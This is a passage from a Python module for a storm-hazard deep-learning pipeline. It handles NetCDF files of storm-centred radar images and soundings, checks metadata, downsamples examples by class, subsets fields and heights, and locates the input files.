str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
],
SOUNDING_HEIGHTS_KEY:
numpy.array(netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:],
dtype=int)
})
return example_dict, netcdf_dataset
def _compare_metadata(netcdf_dataset, example_dict):
"""Compares metadata between existing NetCDF file and new batch of examples.
    If any piece of metadata differs between the two, this method will raise a
    ValueError.
:param netcdf_dataset: Instance of `netCDF4.Dataset`.
:param example_dict: See doc for `write_examples_with_3d_radar`.
:raises: ValueError: if the two sets have different metadata.
"""
include_soundings = SOUNDING_MATRIX_KEY in example_dict
orig_example_dict = {
TARGET_NAMES_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:])
],
ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
RADAR_FIELDS_KEY: [
str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
],
RADAR_HEIGHTS_KEY: numpy.array(
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
)
}
if example_dict[ROTATED_GRIDS_KEY]:
orig_example_dict[ROTATED_GRID_SPACING_KEY] = int(
getattr(netcdf_dataset, ROTATED_GRID_SPACING_KEY)
)
if include_soundings:
orig_example_dict[SOUNDING_FIELDS_KEY] = [
str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
]
orig_example_dict[SOUNDING_HEIGHTS_KEY] = numpy.array(
netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int
)
for this_key in orig_example_dict:
if isinstance(example_dict[this_key], numpy.ndarray):
if numpy.array_equal(example_dict[this_key],
orig_example_dict[this_key]):
continue
else:
if example_dict[this_key] == orig_example_dict[this_key]:
continue
error_string = (
'\n"{0:s}" in existing NetCDF file:\n{1:s}\n\n"{0:s}" in new batch '
'of examples:\n{2:s}\n\n'
).format(
this_key, str(orig_example_dict[this_key]),
str(example_dict[this_key])
)
raise ValueError(error_string)
def _filter_examples_by_class(target_values, downsampling_dict,
test_mode=False):
"""Filters examples by target value.
E = number of examples
:param target_values: length-E numpy array of target values (integer class
labels).
:param downsampling_dict: Dictionary, where each key is the integer
ID for a target class (-2 for "dead storm") and the corresponding value
is the number of examples desired from said class. If
`downsampling_dict is None`, `example_dict` will be returned
without modification.
    :param test_mode: Boolean flag. If True, examples are selected
        deterministically (the first N per class) rather than randomly;
        intended for testing only.
:return: indices_to_keep: 1-D numpy array with indices of examples to keep.
These are all integers in [0, E - 1].
"""
num_examples = len(target_values)
if downsampling_dict is None:
return numpy.linspace(0, num_examples - 1, num=num_examples, dtype=int)
indices_to_keep = numpy.array([], dtype=int)
class_keys = list(downsampling_dict.keys())
for this_class in class_keys:
this_num_storm_objects = downsampling_dict[this_class]
these_indices = numpy.where(target_values == this_class)[0]
this_num_storm_objects = min(
[this_num_storm_objects, len(these_indices)]
)
if this_num_storm_objects == 0:
continue
if test_mode:
these_indices = these_indices[:this_num_storm_objects]
else:
these_indices = numpy.random.choice(
these_indices, size=this_num_storm_objects, replace=False)
indices_to_keep = numpy.concatenate((indices_to_keep, these_indices))
return indices_to_keep
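# Illustrative sketch (class IDs and counts below are hypothetical): keep at
# most 1000 examples of class 0 and 200 examples of class 1.
#
#     indices_to_keep = _filter_examples_by_class(
#         target_values=example_dict[TARGET_MATRIX_KEY][:, 0],
#         downsampling_dict={0: 1000, 1: 200})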
def _file_name_to_batch_number(example_file_name):
"""Parses batch number from file.
:param example_file_name: See doc for `find_example_file`.
:return: batch_number: Integer.
:raises: ValueError: if batch number cannot be parsed from file name.
"""
pathless_file_name = os.path.split(example_file_name)[-1]
extensionless_file_name = os.path.splitext(pathless_file_name)[0]
return int(extensionless_file_name.split('input_examples_batch')[-1])
def _check_target_vars(target_names):
"""Error-checks list of target variables.
Target variables must all have the same mean lead time (average of min and
max lead times) and event type (tornado or wind).
:param target_names: 1-D list with names of target variables. Each must be
accepted by `target_val_utils.target_name_to_params`.
:return: mean_lead_time_seconds: Mean lead time (shared by all target
variables).
:return: event_type_string: Event type.
:raises: ValueError: if target variables do not all have the same mean lead
time or event type.
"""
error_checking.assert_is_string_list(target_names)
error_checking.assert_is_numpy_array(
numpy.array(target_names), num_dimensions=1
)
num_target_vars = len(target_names)
mean_lead_times = numpy.full(num_target_vars, -1, dtype=int)
event_type_strings = numpy.full(num_target_vars, '', dtype=object)
for k in range(num_target_vars):
this_param_dict = target_val_utils.target_name_to_params(
target_names[k]
)
event_type_strings[k] = this_param_dict[target_val_utils.EVENT_TYPE_KEY]
mean_lead_times[k] = int(numpy.round(
(this_param_dict[target_val_utils.MAX_LEAD_TIME_KEY] +
this_param_dict[target_val_utils.MIN_LEAD_TIME_KEY])
/ 2
))
if len(numpy.unique(mean_lead_times)) != 1:
error_string = (
'Target variables (listed below) have different mean lead times.'
'\n{0:s}'
).format(str(target_names))
raise ValueError(error_string)
if len(numpy.unique(event_type_strings)) != 1:
error_string = (
'Target variables (listed below) have different event types.\n{0:s}'
).format(str(target_names))
raise ValueError(error_string)
return mean_lead_times[0], event_type_strings[0]
def _check_layer_operation(example_dict, operation_dict):
"""Error-checks layer operation.
Such operations are used for dimensionality reduction (to convert radar data
from 3-D to 2-D).
:param example_dict: See doc for `reduce_examples_3d_to_2d`.
:param operation_dict: Dictionary with the following keys.
operation_dict["radar_field_name"]: Field to which operation will be
applied.
operation_dict["operation_name"]: Name of operation (must be in list
`VALID_LAYER_OPERATION_NAMES`).
operation_dict["min_height_m_agl"]: Minimum height of layer over which
operation will be applied.
operation_dict["max_height_m_agl"]: Max height of layer over which operation
will be applied.
:raises: ValueError: if something is wrong with the operation params.
"""
if operation_dict[RADAR_FIELD_KEY] in AZIMUTHAL_SHEAR_FIELD_NAMES:
error_string = (
'Layer operations cannot be applied to azimuthal-shear fields '
'(such as "{0:s}").'
).format(operation_dict[RADAR_FIELD_KEY])
raise ValueError(error_string)
if (operation_dict[RADAR_FIELD_KEY] == radar_utils.REFL_NAME
and REFL_IMAGE_MATRIX_KEY in example_dict):
pass
else:
if (operation_dict[RADAR_FIELD_KEY]
not in example_dict[RADAR_FIELDS_KEY]):
error_string = (
'\n{0:s}\nExamples contain only radar fields listed above, '
'which do not include "{1:s}".'
).format(
str(example_dict[RADAR_FIELDS_KEY]),
operation_dict[RADAR_FIELD_KEY]
)
raise ValueError(error_string)
if operation_dict[OPERATION_NAME_KEY] not in VALID_LAYER_OPERATION_NAMES:
error_string = (
'\n{0:s}\nValid operations (listed above) do not include '
'"{1:s}".'
).format(
str(VALID_LAYER_OPERATION_NAMES), operation_dict[OPERATION_NAME_KEY]
)
raise ValueError(error_string)
min_height_m_agl = operation_dict[MIN_HEIGHT_KEY]
max_height_m_agl = operation_dict[MAX_HEIGHT_KEY]
error_checking.assert_is_geq(
min_height_m_agl, numpy.min(example_dict[RADAR_HEIGHTS_KEY])
)
error_checking.assert_is_leq(
max_height_m_agl, numpy.max(example_dict[RADAR_HEIGHTS_KEY])
)
error_checking.assert_is_greater(max_height_m_agl, min_height_m_agl)
def _apply_layer_operation(example_dict, operation_dict):
"""Applies layer operation to radar data.
:param example_dict: See doc for `reduce_examples_3d_to_2d`.
:param operation_dict: See doc for `_check_layer_operation`.
:return: new_radar_matrix: E-by-M-by-N numpy array resulting from layer
operation.
"""
_check_layer_operation(example_dict=example_dict,
operation_dict=operation_dict)
height_diffs_metres = (
example_dict[RADAR_HEIGHTS_KEY] - operation_dict[MIN_HEIGHT_KEY]
).astype(float)
height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
min_height_index = numpy.argmax(height_diffs_metres)
height_diffs_metres = (
operation_dict[MAX_HEIGHT_KEY] - example_dict[RADAR_HEIGHTS_KEY]
).astype(float)
height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
max_height_index = numpy.argmax(height_diffs_metres)
operation_dict[MIN_HEIGHT_KEY] = example_dict[
RADAR_HEIGHTS_KEY][min_height_index]
operation_dict[MAX_HEIGHT_KEY] = example_dict[
RADAR_HEIGHTS_KEY][max_height_index]
operation_name = operation_dict[OPERATION_NAME_KEY]
operation_function = OPERATION_NAME_TO_FUNCTION_DICT[operation_name]
if REFL_IMAGE_MATRIX_KEY in example_dict:
orig_matrix = example_dict[REFL_IMAGE_MATRIX_KEY][
..., min_height_index:(max_height_index + 1), 0]
else:
field_index = example_dict[RADAR_FIELDS_KEY].index(
operation_dict[RADAR_FIELD_KEY])
orig_matrix = example_dict[RADAR_IMAGE_MATRIX_KEY][
..., min_height_index:(max_height_index + 1), field_index]
return operation_function(orig_matrix, axis=-1), operation_dict
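# Illustrative sketch (heights are hypothetical): take the column max of
# reflectivity over the 1000-3000 m AGL layer, using the keys defined at the
# top of this module.
#
#     operation_dict = {
#         RADAR_FIELD_KEY: radar_utils.REFL_NAME,
#         OPERATION_NAME_KEY: MAX_OPERATION_NAME,
#         MIN_HEIGHT_KEY: 1000,
#         MAX_HEIGHT_KEY: 3000
#     }
#     new_radar_matrix, operation_dict = _apply_layer_operation(
#         example_dict=example_dict, operation_dict=operation_dict)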
def _subset_radar_data(
example_dict, netcdf_dataset_object, example_indices_to_keep,
field_names_to_keep, heights_to_keep_m_agl, num_rows_to_keep,
num_columns_to_keep):
"""Subsets radar data by field, height, and horizontal extent.
If the file contains both 2-D shear images and 3-D reflectivity images (like
MYRORSS data):
- `field_names_to_keep` will be interpreted as a list of shear fields to
keep. If None, all shear fields will be kept.
- `heights_to_keep_m_agl` will be interpreted as a list of reflectivity
heights to keep. If None, all reflectivity heights will be kept.
If the file contains only 2-D images, `field_names_to_keep` and
`heights_to_keep_m_agl` will be considered together, as a list of
field/height pairs to keep. If either argument is None, then all
field-height pairs will be kept.
If the file contains only 3-D images, `field_names_to_keep` and
`heights_to_keep_m_agl` will be considered separately:
- `field_names_to_keep` will be interpreted as a list of fields to keep. If
None, all fields will be kept.
- `heights_to_keep_m_agl` will be interpreted as a list of heights to keep.
If None, all heights will be kept.
:param example_dict: See output doc for `_read_metadata_from_example_file`.
:param netcdf_dataset_object: Same.
:param example_indices_to_keep: 1-D numpy array with indices of examples
(storm objects) to keep. These are examples in `netcdf_dataset_object`
for which radar data will be added to `example_dict`.
:param field_names_to_keep: See discussion above.
:param heights_to_keep_m_agl: See discussion above.
:param num_rows_to_keep: Number of grid rows to keep. Images will be
center-cropped (i.e., rows will be removed from the edges) to meet the
desired number of rows. If None, all rows will be kept.
:param num_columns_to_keep: Same as above but for columns.
:return: example_dict: Same as input but with the following exceptions.
[1] Keys "radar_field_names" and "radar_heights_m_agl" may have different
values.
[2] If file contains both 2-D and 3-D images, dictionary now contains keys
"reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01".
[3] If file contains only 2-D or only 3-D images, dictionary now contains
key "radar_image_matrix".
"""
if field_names_to_keep is None:
field_names_to_keep = copy.deepcopy(example_dict[RADAR_FIELDS_KEY])
if heights_to_keep_m_agl is None:
heights_to_keep_m_agl = example_dict[RADAR_HEIGHTS_KEY] + 0
error_checking.assert_is_numpy_array(
numpy.array(field_names_to_keep), num_dimensions=1
)
heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int)
error_checking.assert_is_numpy_array(
heights_to_keep_m_agl, num_dimensions=1)
if RADAR_IMAGE_MATRIX_KEY in netcdf_dataset_object.variables:
radar_matrix = numpy.array(
netcdf_dataset_object.variables[RADAR_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
num_radar_dimensions = len(radar_matrix.shape) - 2
if num_radar_dimensions == 2:
these_indices = [
numpy.where(numpy.logical_and(
example_dict[RADAR_FIELDS_KEY] == f,
example_dict[RADAR_HEIGHTS_KEY] == h
))[0][0]
for f, h in zip(field_names_to_keep, heights_to_keep_m_agl)
]
these_indices = numpy.array(these_indices, dtype=int)
radar_matrix = radar_matrix[..., these_indices]
else:
these_field_indices = numpy.array([
example_dict[RADAR_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
radar_matrix = radar_matrix[..., these_field_indices]
these_height_indices = numpy.array([
numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
radar_matrix = radar_matrix[..., these_height_indices, :]
radar_matrix = storm_images.downsize_storm_images(
storm_image_matrix=radar_matrix,
radar_field_name=field_names_to_keep[0],
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
example_dict[RADAR_IMAGE_MATRIX_KEY] = radar_matrix
else:
reflectivity_matrix_dbz = numpy.array(
netcdf_dataset_object.variables[REFL_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
reflectivity_matrix_dbz = numpy.expand_dims(
reflectivity_matrix_dbz, axis=-1
)
azimuthal_shear_matrix_s01 = numpy.array(
netcdf_dataset_object.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
these_height_indices = numpy.array([
numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
reflectivity_matrix_dbz = reflectivity_matrix_dbz[
..., these_height_indices, :]
these_field_indices = numpy.array([
example_dict[RADAR_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
azimuthal_shear_matrix_s01 = azimuthal_shear_matrix_s01[
..., these_field_indices]
reflectivity_matrix_dbz = storm_images.downsize_storm_images(
storm_image_matrix=reflectivity_matrix_dbz,
radar_field_name=radar_utils.REFL_NAME,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
azimuthal_shear_matrix_s01 = storm_images.downsize_storm_images(
storm_image_matrix=azimuthal_shear_matrix_s01,
radar_field_name=field_names_to_keep[0],
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
example_dict[REFL_IMAGE_MATRIX_KEY] = reflectivity_matrix_dbz
example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] = azimuthal_shear_matrix_s01
example_dict[RADAR_FIELDS_KEY] = field_names_to_keep
example_dict[RADAR_HEIGHTS_KEY] = heights_to_keep_m_agl
return example_dict
def _subset_sounding_data(
example_dict, netcdf_dataset_object, example_indices_to_keep,
field_names_to_keep, heights_to_keep_m_agl):
"""Subsets sounding data by field and height.
:param example_dict: See doc for `_subset_radar_data`.
:param netcdf_dataset_object: Same.
:param example_indices_to_keep: Same.
:param field_names_to_keep: 1-D list of field names to keep. If None, will
keep all fields.
:param heights_to_keep_m_agl: 1-D numpy array of heights to keep. If None,
will keep all heights.
:return: example_dict: Same as input but with the following exceptions.
[1] Keys "sounding_field_names" and "sounding_heights_m_agl" may have
different values.
[2] Key "sounding_matrix" has been added.
"""
if field_names_to_keep is None:
field_names_to_keep = copy.deepcopy(example_dict[SOUNDING_FIELDS_KEY])
if heights_to_keep_m_agl is None:
heights_to_keep_m_agl = example_dict[SOUNDING_HEIGHTS_KEY] + 0
error_checking.assert_is_numpy_array(
numpy.array(field_names_to_keep), num_dimensions=1
)
heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int)
error_checking.assert_is_numpy_array(
heights_to_keep_m_agl, num_dimensions=1)
sounding_matrix = numpy.array(
netcdf_dataset_object.variables[SOUNDING_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
# TODO(thunderhoser): This is a HACK.
spfh_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.SPECIFIC_HUMIDITY_NAME)
temp_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.TEMPERATURE_NAME)
pressure_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.PRESSURE_NAME)
theta_v_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.VIRTUAL_POTENTIAL_TEMPERATURE_NAME)
sounding_matrix[..., spfh_index][
numpy.isnan(sounding_matrix[..., spfh_index])
] = 0.
nan_example_indices, nan_height_indices = numpy.where(numpy.isnan(
sounding_matrix[..., theta_v_index]
))
if len(nan_example_indices) > 0:
this_temp_matrix_kelvins = sounding_matrix[..., temp_index][
nan_example_indices, nan_height_indices]
this_pressure_matrix_pa = sounding_matrix[..., pressure_index][
nan_example_indices, nan_height_indices]
this_thetav_matrix_kelvins = (
temp_conversion.temperatures_to_potential_temperatures(
temperatures_kelvins=this_temp_matrix_kelvins,
total_pressures_pascals=this_pressure_matrix_pa)
)
sounding_matrix[..., theta_v_index][
nan_example_indices, nan_height_indices
] = this_thetav_matrix_kelvins
these_indices = numpy.array([
example_dict[SOUNDING_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
sounding_matrix = sounding_matrix[..., these_indices]
these_indices = numpy.array([
numpy.where(example_dict[SOUNDING_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
sounding_matrix = sounding_matrix[..., these_indices, :]
example_dict[SOUNDING_FIELDS_KEY] = field_names_to_keep
example_dict[SOUNDING_HEIGHTS_KEY] = heights_to_keep_m_agl
example_dict[SOUNDING_MATRIX_KEY] = sounding_matrix
return example_dict
def find_storm_images_2d(
top_directory_name, radar_source, radar_field_names,
first_spc_date_string, last_spc_date_string, radar_heights_m_agl=None,
reflectivity_heights_m_agl=None):
"""Locates files with 2-D storm-centered radar images.
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: Name of top-level directory. Files therein will
be found by `storm_images.find_storm_image_file`.
:param radar_source: Data source (must be accepted by
`radar_utils.check_data_source`).
:param radar_field_names: 1-D list of radar fields. Each item must be
accepted by `radar_utils.check_field_name`.
:param first_spc_date_string: First SPC date (format "yyyymmdd"). This
method will locate files from `first_spc_date_string`...
`last_spc_date_string`.
:param last_spc_date_string: Same.
:param radar_heights_m_agl: [used only if radar_source = "gridrad"]
1-D numpy array of radar heights (metres above ground level). These
heights apply to all radar fields.
:param reflectivity_heights_m_agl: [used only if radar_source != "gridrad"]
1-D numpy array of reflectivity heights (metres above ground level).
These heights do not apply to other radar fields.
:return: radar_file_name_matrix: D-by-C numpy array of file paths.
"""
radar_utils.check_data_source(radar_source)
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
storm_image_file_dict = storm_images.find_many_files_gridrad(
top_directory_name=top_directory_name,
radar_field_names=radar_field_names,
radar_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False, raise_error_if_all_missing=True)
else:
storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name, radar_source=radar_source,
radar_field_names=radar_field_names,
reflectivity_heights_m_agl=reflectivity_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = storm_image_file_dict[
storm_images.IMAGE_FILE_NAMES_KEY]
num_file_times = radar_file_name_matrix.shape[0]
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
num_field_height_pairs = (
radar_file_name_matrix.shape[1] * radar_file_name_matrix.shape[2]
)
radar_file_name_matrix = numpy.reshape(
radar_file_name_matrix, (num_file_times, num_field_height_pairs)
)
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
return numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
def find_storm_images_3d(
top_directory_name, radar_source, radar_field_names,
radar_heights_m_agl, first_spc_date_string, last_spc_date_string):
"""Locates files with 3-D storm-centered radar images.
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: See doc for `find_storm_images_2d`.
:param radar_source: Same.
:param radar_field_names: List (length F_r) of radar fields. Each item must
be accepted by `radar_utils.check_field_name`.
:param radar_heights_m_agl: numpy array (length H_r) of radar heights
(metres above ground level).
:param first_spc_date_string: First SPC date (format "yyyymmdd"). This
method will locate files from `first_spc_date_string`...
`last_spc_date_string`.
:param last_spc_date_string: Same.
:return: radar_file_name_matrix: numpy array (D x F_r x H_r) of file paths.
"""
radar_utils.check_data_source(radar_source)
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
file_dict = storm_images.find_many_files_gridrad(
top_directory_name=top_directory_name,
radar_field_names=radar_field_names,
radar_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False, raise_error_if_all_missing=True)
else:
file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name, radar_source=radar_source,
radar_field_names=[radar_utils.REFL_NAME],
reflectivity_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = file_dict[storm_images.IMAGE_FILE_NAMES_KEY]
num_file_times = radar_file_name_matrix.shape[0]
if radar_source != radar_utils.GRIDRAD_SOURCE_ID:
radar_file_name_matrix = numpy.reshape(
radar_file_name_matrix,
(num_file_times, 1, len(radar_heights_m_agl))
)
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
return numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
def find_storm_images_2d3d_myrorss(
top_directory_name, first_spc_date_string, last_spc_date_string,
reflectivity_heights_m_agl):
"""Locates files with 2-D and 3-D storm-centered radar images.
Fields in 2-D images: low-level and mid-level azimuthal shear
Field in 3-D images: reflectivity
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: See doc for `find_storm_images_2d`.
:param first_spc_date_string: Same.
:param last_spc_date_string: Same.
:param reflectivity_heights_m_agl: Same.
:return: az_shear_file_name_matrix: D-by-2 numpy array of file paths. Files
in column 0 are low-level az shear; files in column 1 are mid-level az
shear.
:return: reflectivity_file_name_matrix: D-by-H numpy array of file paths,
where H = number of reflectivity heights.
"""
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
field_names = AZIMUTHAL_SHEAR_FIELD_NAMES + [radar_utils.REFL_NAME]
storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name,
radar_source=radar_utils.MYRORSS_SOURCE_ID,
radar_field_names=field_names,
reflectivity_heights_m_agl=reflectivity_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = storm_image_file_dict[
storm_images.IMAGE_FILE_NAMES_KEY]
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
radar_file_name_matrix = numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
return radar_file_name_matrix[:, :2], radar_file_name_matrix[:, 2:]
def find_sounding_files(
top_sounding_dir_name, radar_file_name_matrix, target_names,
lag_time_for_convective_contamination_sec):
"""Locates files with storm-centered soundings.
D = number of SPC dates in time period
:param top_sounding_dir_name: Name of top-level directory. Files therein
will be found by `soundings.find_sounding_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param target_names: See doc for `_check_target_vars`.
:param lag_time_for_convective_contamination_sec: See doc for
`soundings.read_soundings`.
:return: sounding_file_names: length-D list of file paths.
"""
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
mean_lead_time_seconds = _check_target_vars(target_names)[0]
num_file_times = radar_file_name_matrix.shape[0]
sounding_file_names = [''] * num_file_times
for i in range(num_file_times):
if num_file_dimensions == 2:
this_file_name = radar_file_name_matrix[i, 0]
else:
this_file_name = radar_file_name_matrix[i, 0, 0]
this_time_unix_sec, this_spc_date_string = (
storm_images.image_file_name_to_time(this_file_name)
)
sounding_file_names[i] = soundings.find_sounding_file(
top_directory_name=top_sounding_dir_name,
spc_date_string=this_spc_date_string,
lead_time_seconds=mean_lead_time_seconds,
lag_time_for_convective_contamination_sec=
lag_time_for_convective_contamination_sec,
init_time_unix_sec=this_time_unix_sec, raise_error_if_missing=True)
return sounding_file_names
def find_target_files(top_target_dir_name, radar_file_name_matrix,
target_names):
"""Locates files with target values (storm-hazard indicators).
D = number of SPC dates in time period
:param top_target_dir_name: Name of top-level directory. Files therein
will be found by `target_val_utils.find_target_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param target_names: See doc for `_check_target_vars`.
:return: target_file_names: length-D list of file paths.
"""
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
event_type_string = _check_target_vars(target_names)[-1]
num_file_times = radar_file_name_matrix.shape[0]
target_file_names = [''] * num_file_times
for i in range(num_file_times):
if num_file_dimensions == 2:
this_file_name = radar_file_name_matrix[i, 0]
else:
this_file_name = radar_file_name_matrix[i, 0, 0]
_, this_spc_date_string = storm_images.image_file_name_to_time(
this_file_name)
target_file_names[i] = target_val_utils.find_target_file(
top_directory_name=top_target_dir_name,
event_type_string=event_type_string,
spc_date_string=this_spc_date_string, raise_error_if_missing=False)
if os.path.isfile(target_file_names[i]):
continue
target_file_names[i] = None
return target_file_names
def subset_examples(example_dict, indices_to_keep, create_new_dict=False):
"""Subsets examples in dictionary.
:param example_dict: See doc for `write_example_file`.
:param indices_to_keep: 1-D numpy array with indices of examples to keep.
:param create_new_dict: Boolean flag. If True, this method will create a
new dictionary, leaving the input dictionary untouched.
:return: example_dict: Same as input, but possibly with fewer examples.
"""
error_checking.assert_is_integer_numpy_array(indices_to_keep)
error_checking.assert_is_numpy_array(indices_to_keep, num_dimensions=1)
error_checking.assert_is_boolean(create_new_dict)
if not create_new_dict:
for this_key in MAIN_KEYS:
optional_key_missing = (
this_key not in REQUIRED_MAIN_KEYS
and this_key not in example_dict
)
if optional_key_missing:
continue
if this_key == TARGET_MATRIX_KEY:
if this_key in example_dict:
example_dict[this_key] = (
example_dict[this_key][indices_to_keep, ...]
)
else:
example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][indices_to_keep]
)
continue
if this_key == FULL_IDS_KEY:
example_dict[this_key] = [
example_dict[this_key][k] for k in indices_to_keep
]
else:
example_dict[this_key] = example_dict[this_key][
indices_to_keep, ...]
return example_dict
new_example_dict = {}
for this_key in METADATA_KEYS:
sounding_key_missing = (
this_key in [SOUNDING_FIELDS_KEY, SOUNDING_HEIGHTS_KEY]
and this_key not in example_dict
)
if sounding_key_missing:
continue
if this_key == TARGET_NAMES_KEY:
if this_key in example_dict:
new_example_dict[this_key] = example_dict[this_key]
else:
new_example_dict[TARGET_NAME_KEY] = example_dict[
TARGET_NAME_KEY]
continue
new_example_dict[this_key] = example_dict[this_key]
for this_key in MAIN_KEYS:
optional_key_missing = (
this_key not in REQUIRED_MAIN_KEYS
and this_key not in example_dict
)
if optional_key_missing:
continue
if this_key == TARGET_MATRIX_KEY:
if this_key in example_dict:
new_example_dict[this_key] = (
example_dict[this_key][indices_to_keep, ...]
)
else:
new_example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][indices_to_keep]
)
continue
if this_key == FULL_IDS_KEY:
new_example_dict[this_key] = [
example_dict[this_key][k] for k in indices_to_keep
]
else:
new_example_dict[this_key] = example_dict[this_key][
indices_to_keep, ...]
return new_example_dict
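# Usage sketch (illustrative only): keep the first ten examples without
# mutating the source dictionary.  Assumes `example_dict` holds at least ten
# examples.
def _demo_subset_examples(example_dict):
    import numpy
    first_ten_indices = numpy.linspace(0, 9, num=10, dtype=int)
    return subset_examples(
        example_dict=example_dict, indices_to_keep=first_ten_indices,
        create_new_dict=True)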
def find_example_file(
top_directory_name, shuffled=True, spc_date_string=None,
batch_number=None, raise_error_if_missing=True):
"""Looks for file with input examples.
If `shuffled = True`, this method looks for a file with shuffled examples
(from many different times). If `shuffled = False`, this method looks for a
file with examples from one SPC date.
:param top_directory_name: Name of top-level directory with input examples.
:param shuffled: Boolean flag. The role of this flag is explained in the
general discussion above.
:param spc_date_string: [used only if `shuffled = False`]
SPC date (format "yyyymmdd").
:param batch_number: [used only if `shuffled = True`]
Batch number (integer).
:param raise_error_if_missing: Boolean flag. If file is missing and
`raise_error_if_missing = True`, this method will error out.
:return: example_file_name: Path to file with input examples. If file is
missing and `raise_error_if_missing = False`, this is the *expected*
path.
:raises: ValueError: if file is missing and `raise_error_if_missing = True`.
"""
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(shuffled)
error_checking.assert_is_boolean(raise_error_if_missing)
if shuffled:
error_checking.assert_is_integer(batch_number)
error_checking.assert_is_geq(batch_number, 0)
first_batch_number = int(number_rounding.floor_to_nearest(
batch_number, NUM_BATCHES_PER_DIRECTORY))
